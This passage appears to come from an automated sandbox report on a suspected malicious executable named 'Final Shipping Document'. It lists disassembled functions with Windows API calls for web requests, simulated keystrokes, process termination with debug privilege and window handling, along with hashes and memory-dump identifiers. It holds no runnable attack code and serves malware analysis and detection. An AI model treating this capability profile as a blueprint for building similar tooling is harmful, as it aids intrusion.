                                                            • Opcode Fuzzy Hash: d99c11a14377d03f8b51ed6d09c8955a9d96fba440a1545c9c527939d2734898
                                                            • Instruction Fuzzy Hash: 7F317FB1540604AFD7219F658CC8BEF7BFCEB4A744B50851DF466E2210DB34DD84AB61
                                                            Function 00C0989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BE3AAF,?,?,Bad directive syntax error,00C3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C098BC
                                                            • LoadStringW.USER32(00000000,?,00BE3AAF,?), ref: 00C098C3
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C09987
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 858772685-4153970271
                                                            • Opcode ID: e23770f2c4a3f14ae9485b0bd1c7a0db96be3c838e862ad99609c9f28c18164a
                                                            • Instruction ID: 3031df925eec97c3373fc1ed15a3900313ca1329fe2fe2723cdc50b16c8df036
                                                            • Opcode Fuzzy Hash: e23770f2c4a3f14ae9485b0bd1c7a0db96be3c838e862ad99609c9f28c18164a
                                                            • Instruction Fuzzy Hash: 4C218D3280421AABCF21EF90CC46FFE77B5FF19700F0444A9F519620A2EB719A18DB50
                                                            Function 00C0209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32 ref: 00C020AB
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00C020C0
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C0214D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1290815626-3381328864
                                                            • Opcode ID: 227279cb58b36dfabb14001c06c358b9f6576c76bbd28bc007b2821b71e470c7
                                                            • Instruction ID: 86aa876274cba66310217bf5ca4596f8970e40f212179290039f60adc982f531
                                                            • Opcode Fuzzy Hash: 227279cb58b36dfabb14001c06c358b9f6576c76bbd28bc007b2821b71e470c7
                                                            • Instruction Fuzzy Hash: 2B113676288306BAFA252220DC0BEAE73ECCB04324F20006AFB04A40D1EB616D029614
                                                            Function 00BDCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                            • String ID:
                                                            • API String ID: 1282221369-0
                                                            • Opcode ID: d0ac4ccd9508d6bf6c56b781e454d6c9d12a8fd4b175fcc0db79791fe53c6927
                                                            • Instruction ID: e40bd1277902ec4af53692416abe08fffaafe8b42ae8396c1e549099cd966c53
                                                            • Opcode Fuzzy Hash: d0ac4ccd9508d6bf6c56b781e454d6c9d12a8fd4b175fcc0db79791fe53c6927
                                                            • Instruction Fuzzy Hash: 7B610FB1904342AFDB21AFB49895BADFFE5EF11310F1441EBE94497382F6319905D790
                                                            Function 00C350D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C35186
                                                            • ShowWindow.USER32(?,00000000), ref: 00C351C7
                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00C351CD
                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00C351D1
                                                              • Part of subcall function 00C36FBA: DeleteObject.GDI32(00000000), ref: 00C36FE6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C3520D
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C3521A
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C3524D
                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C35287
                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C35296
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                            • String ID:
                                                            • API String ID: 3210457359-0
                                                            • Opcode ID: 70c767354c786eb493d6b5e8408d1ebef5a7283c1981828c5c3fdb32de1a9d74
                                                            • Instruction ID: 0a701ac7875dbd9aa212af1eae6d7abc91ada1c5eb15c2b32a1ca358d5cb0327
                                                            • Opcode Fuzzy Hash: 70c767354c786eb493d6b5e8408d1ebef5a7283c1981828c5c3fdb32de1a9d74
                                                            • Instruction Fuzzy Hash: 2C519230A60A08BFEF209F25CC4ABDD3BA5FB05361F144511FA25962E1C776AA90DB41
                                                            Function 00BB8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00BF6890
                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BF68A9
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BF68B9
                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BF68D1
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BF68F2
                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF6901
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BF691E
                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00BF692D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                            • String ID:
                                                            • API String ID: 1268354404-0
                                                            • Opcode ID: 69cae79b3289c9fb076b3cbcdd8eb27668ec76e2d1874a1765f6e5168c77be0a
                                                            • Instruction ID: 6d3394f21100f192ecedfa5e8cbc6f5dc5eea187f5ff9a7fab5d25e5f88b46b9
                                                            • Opcode Fuzzy Hash: 69cae79b3289c9fb076b3cbcdd8eb27668ec76e2d1874a1765f6e5168c77be0a
                                                            • Instruction Fuzzy Hash: 05517B70610209EFDB20CF24CC95BBE7BF9EB48760F144558FA16A72A0DBB1E990DB50
                                                            Function 00C1C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C182
                                                            • GetLastError.KERNEL32 ref: 00C1C195
                                                            • SetEvent.KERNEL32(?), ref: 00C1C1A9
                                                              • Part of subcall function 00C1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C1C272
                                                              • Part of subcall function 00C1C253: GetLastError.KERNEL32 ref: 00C1C322
                                                              • Part of subcall function 00C1C253: SetEvent.KERNEL32(?), ref: 00C1C336
                                                              • Part of subcall function 00C1C253: InternetCloseHandle.WININET(00000000), ref: 00C1C341
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                            • String ID:
                                                            • API String ID: 337547030-0
                                                            • Opcode ID: 8b8a0cb086132a2fe04efceae8a259efb65511a9cbb3bf70d37dc46a513857e9
                                                            • Instruction ID: ebb8405c13f216b9efa6889b3dea77051d9b7e10140b0d73302e672544ff93a4
                                                            • Opcode Fuzzy Hash: 8b8a0cb086132a2fe04efceae8a259efb65511a9cbb3bf70d37dc46a513857e9
                                                            • Instruction Fuzzy Hash: 1D318F71280601BFDB219FA5DC84BAFBBF9FF1A300B10841DF96692610D731E954EB60
                                                            Function 00C025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                              • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32 ref: 00C03A5E
                                                              • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A65
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025BD
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C025DB
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C025DF
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C025E9
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C02601
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C02605
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C0260F
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C02623
                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C02627
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            • Opcode ID: 90e9d906a7c8c3db885e6f31241fda3b494a677b4cc2bb2129d8c28fa34fc7fb
                                                            • Instruction ID: ece1dbab26eeaaaec49efb2728a2e7ef71d93d73df16c9ffcd4624f50f2ef86a
                                                            • Opcode Fuzzy Hash: 90e9d906a7c8c3db885e6f31241fda3b494a677b4cc2bb2129d8c28fa34fc7fb
                                                            • Instruction Fuzzy Hash: 6201D4313A4610BBFB2067699CCEF5D3F59DB4EB12F100001F318BE0D1C9E22444EA69
                                                            Function 00C01803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C01449,?,?,00000000), ref: 00C0180C
                                                            • HeapAlloc.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C01813
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01828
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00C01449,?,?,00000000), ref: 00C01830
                                                            • DuplicateHandle.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C01833
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C01449,?,?,00000000), ref: 00C01843
                                                            • GetCurrentProcess.KERNEL32(00C01449,00000000,?,00C01449,?,?,00000000), ref: 00C0184B
                                                            • DuplicateHandle.KERNEL32(00000000,?,00C01449,?,?,00000000), ref: 00C0184E
                                                            • CreateThread.KERNEL32(00000000,00000000,00C01874,00000000,00000000,00000000), ref: 00C01868
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 42d12fce873f850ba7c6289e8bab0207fd5d40662f9f3f3e4efa18769ce79d07
                                                            • Instruction ID: 72f6bdec9f375b66c51fbb3272d5422e9d29d486a310ac1aab4dd2b27ba9100c
                                                            • Opcode Fuzzy Hash: 42d12fce873f850ba7c6289e8bab0207fd5d40662f9f3f3e4efa18769ce79d07
                                                            • Instruction Fuzzy Hash: AF01BBB5250308BFE710ABA5DC8DF6F7BACEB89B11F018411FA05EB1A1CA70D810DB20
                                                            Function 00C2A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                              • Part of subcall function 00C0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                              • Part of subcall function 00C0D4DC: CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A16D
                                                            • GetLastError.KERNEL32 ref: 00C2A180
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C2A1B3
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C2A268
                                                            • GetLastError.KERNEL32(00000000), ref: 00C2A273
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2A2C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 49f22f6100dd80775b82edfdebbb32acaa17270c5f3948aef7e170e73dd5fe79
                                                            • Instruction ID: 1b0dc1764e1c8acc037251bb68776f494cd4069bf3c6a20dd192d499e9f2acce
                                                            • Opcode Fuzzy Hash: 49f22f6100dd80775b82edfdebbb32acaa17270c5f3948aef7e170e73dd5fe79
                                                            • Instruction Fuzzy Hash: BB618070208252EFD710DF19D494F19BBE1AF45318F19849CE46A8BBA3C772ED49CB92
                                                            Function 00C33886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C33925
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C3393A
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C33954
                                                            • _wcslen.LIBCMT ref: 00C33999
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C339C6
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C339F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcslen
                                                            • String ID: SysListView32
                                                            • API String ID: 2147712094-78025650
                                                            • Opcode ID: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                            • Instruction ID: 5f8de08b4c8f9d5369882384cd686e0e0613b2f81c97c99417f86c1425ea3b94
                                                            • Opcode Fuzzy Hash: 5f2acf0338083346679d402527c935b5f0e3a243a7e6b586c8c4dfff32307ba1
                                                            • Instruction Fuzzy Hash: B341A271A10358ABEB219F64CC49FEE77A9EF08350F140566F958E7281D7719A80CB90
                                                            Function 00C0BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C0BCFD
                                                            • IsMenu.USER32(00000000), ref: 00C0BD1D
                                                            • CreatePopupMenu.USER32 ref: 00C0BD53
                                                            • GetMenuItemCount.USER32(015E64B8), ref: 00C0BDA4
                                                            • InsertMenuItemW.USER32(015E64B8,?,00000001,00000030), ref: 00C0BDCC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                            • String ID: 0$2
                                                            • API String ID: 93392585-3793063076
                                                            • Opcode ID: 40c00c8ec68707233edcfe95bcc7a7d3b267b1282b13287443f4e5fb65edc79c
                                                            • Instruction ID: e5edddcef9b9b26098d7913b86c5cab91f5c7d3654895076842968b391fccd47
                                                            • Opcode Fuzzy Hash: 40c00c8ec68707233edcfe95bcc7a7d3b267b1282b13287443f4e5fb65edc79c
                                                            • Instruction Fuzzy Hash: 57518C70A003069BDB10DFA9D8C8BAEFBF4AF55314F148259E421A72D9D770AE41CB61
                                                            Function 00C0C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 00C0C913
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                            • Instruction ID: 872879ab4180d8a3c65eeebec9937cfa2c0aacb40b2a0dff6a58136f16b22063
                                                            • Opcode Fuzzy Hash: f11daf9fe25d67657320b8f4825a356efb748a9e8e80335aae9715d58a05e6e1
                                                            • Instruction Fuzzy Hash: B2113A32689306BAE7149B149CC3EAE37DCDF15715F20423EF904A62C2E7B09F009268
                                                            Function 00C0ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$LocalTime
                                                            • String ID:
                                                            • API String ID: 952045576-0
                                                            • Opcode ID: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                            • Instruction ID: e74766a4bbe17c79024f64d9dfc7a1eb7de6d35cf1cf71a6b7ffac112478f028
                                                            • Opcode Fuzzy Hash: 57748cc3be02c37fa48cdd0eef28d6457c7c1fec482ac9dea566125d13a64f03
                                                            • Instruction Fuzzy Hash: 45419265C1021875CB11EBF4C88AEDFB7E8AF45710F5088AAE528E3161FB34E755C3A5
                                                            Function 00BBF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00BBF953
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00BFF3D1
                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BF682C,00000004,00000000,00000000), ref: 00BFF454
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 19c3a5131cab2e99045c422cff9c29a376279b03b510501c5e52b09a99f2edbe
